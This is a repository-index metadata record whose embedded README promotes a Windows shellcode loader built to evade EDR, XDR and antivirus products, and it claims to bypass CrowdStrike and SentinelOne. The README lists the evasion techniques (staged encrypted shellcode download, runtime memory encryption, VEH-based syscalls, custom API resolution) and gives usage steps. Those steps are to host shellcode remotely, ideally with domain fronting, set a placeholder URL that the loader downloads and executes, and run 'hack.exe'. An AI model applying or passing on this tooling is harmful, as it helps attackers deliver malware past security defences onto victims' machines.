{"id":23421550,"url":"https://github.com/evilbytecode/edr-xdr-av-bypass-shellcode-loader","last_synced_at":"2025-10-30T07:31:01.300Z","repository":{"id":268281949,"uuid":"903853240","full_name":"EvilBytecode/EDR-XDR-AV-Bypass-Shellcode-Loader","owner":"EvilBytecode","description":"Bypassing major EDRs with staged shellcode, custom GetModuleHandleW and GetProcAddress, VEH syscalls \u0026 more.","archived":false,"fork":false,"pushed_at":"2025-02-07T17:44:33.000Z","size":18,"stargazers_count":9,"open_issues_count":0,"forks_count":3,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-02-07T18:33:31.601Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/EvilBytecode.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-12-15T18:10:57.000Z","updated_at":"2025-02-07T17:44:36.000Z","dependencies_parsed_at":"2024-12-15T19:33:12.522Z","dependency_job_id":"30255f44-5ea4-48a2-87a6-237b6a40ff69","html_url":"https://github.com/EvilBytecode/EDR-XDR-AV-Bypass-Shellcode-Loader","commit_stats":null,"previous_names":["evilbytecode/edr-xdr-av-bypass-shellcode-loader"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EvilBytecode%2FEDR-XDR-AV-Bypass-Shellcode-Loader","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EvilBytecode%2FEDR-XDR-AV-Bypass-Shellcode-Loader/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EvilBytecode%2FEDR-XDR-AV-Bypass-Shellcode-Loader/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EvilBytecode%2FEDR-XDR-AV-Bypass-Shellcode-Loader/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/EvilBytecode","download_url":"https://codeload.github.com/EvilBytecode/EDR-XDR-AV-Bypass-Shellcode-Loader/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":238941490,"owners_count":19556008,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-12-23T02:16:01.203Z","updated_at":"2025-10-30T07:31:01.289Z","avatar_url":"https://github.com/EvilBytecode.png","language":"C","readme":"# EDR-XDR-AV-Bypass-Shellcode-Loader\n- CURRENTLY BYPASSES CROWDSTRIKE \u0026 SENTINEL ONE RUNTIME.\n- SCROLL DOWN TO FIND DETECTIONS (RUNTIME \u0026 STATIC TIME ANALYSIS)\n---\n![image](https://github.com/user-attachments/assets/c9945d69-547c-4c21-923a-20325c886844)\n\n## Overview\nThis project provides an advanced shellcode loader capable of bypassing major EDRs (Endpoint Detection and Response), XDRs, and AV (Antivirus) systems. 
The shellcode is executed in a staged manner with techniques such as memory protection manipulation, VEH (Vectored Exception Handling), and system calls to evade detection.\n\n## Features\n- **Staged Shellcode Execution**: Downloads and executes shellcode in multiple steps to minimize detection.\n- **Custom Memory Protection**: Evades modern antivirus memory scanners by encrypting a function at runtime, decrypting it only when it needs to execute, and re-encrypting it once it has finished executing.\n- **Vectored Exception Handling (VEH)**: Handles memory access violations and redirects execution flow.\n- **Encrypted Shellcode**: Shellcode is encrypted during download and decrypted in-memory before execution.\n- Custom ```GetProcAddress``` \u0026 ```GetModuleHandleW```\n\n## Prerequisites\n- Windows Operating System (x64)\n- Visual Studio or compatible C++ compiler\n- Internet connection (for staged shellcode download)\n\n## Usage\n\n### Build\n1. Clone the repository:\n2. Open the project in Visual Studio or your preferred C++ environment (I use VS Code).\n3. Compile the project in Release mode for a production-ready executable.\n\n### Execution\n1. Host the shellcode binary on a remote server (e.g., Discord, AWS, or any public URL, works best with domain fronting).\n2. Update the shellcode URL in the `main` function:\n   ```cpp\n   std::wstring url = L\"https://your-hosted-url/shellcode.bin\";\n   ```\n3. Run the executable:\n   ```bash\n   hack.exe\n   ```\n\n## DETECTIONS (scanner.to / kleenscan)\n![image](https://github.com/user-attachments/assets/0afe46a9-9aa7-450c-9ec1-85e898ae4487)\n![image](https://github.com/user-attachments/assets/b8d4a182-e35e-46f0-a052-04e488674069)\n![image](https://github.com/user-attachments/assets/0a3b4308-014e-4dc3-ae99-6faf52b77fc6)\n\n## Disclaimer\nThis tool is intended for educational and research purposes only. Misuse of this tool for malicious purposes is strictly prohibited and against the law. The author does not condone or support any illegal activity.\n\n## References that might help you:\n- https://redops.at/en/blog/syscalls-via-vectored-exception-handling#:~:text=What%20is%20meant%20by%20syscalls%20via%20vectored%20exception,a%20VEH%20function%20and%20deliberately%20throwing%20an%20exception.\n- https://whiteknightlabs.com/2024/07/31/layeredsyscall-abusing-veh-to-bypass-edrs/\n- https://github.com/C5Hackr/Segment-Encryption\n- https://revers.engineering/custom-getprocaddress-and-getmodulehandle-implementation-x64/\n\n## License\nThis project is licensed under the MIT License. See the LICENSE file for details.","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fevilbytecode%2Fedr-xdr-av-bypass-shellcode-loader","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fevilbytecode%2Fedr-xdr-av-bypass-shellcode-loader","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fevilbytecode%2Fedr-xdr-av-bypass-shellcode-loader/lists"}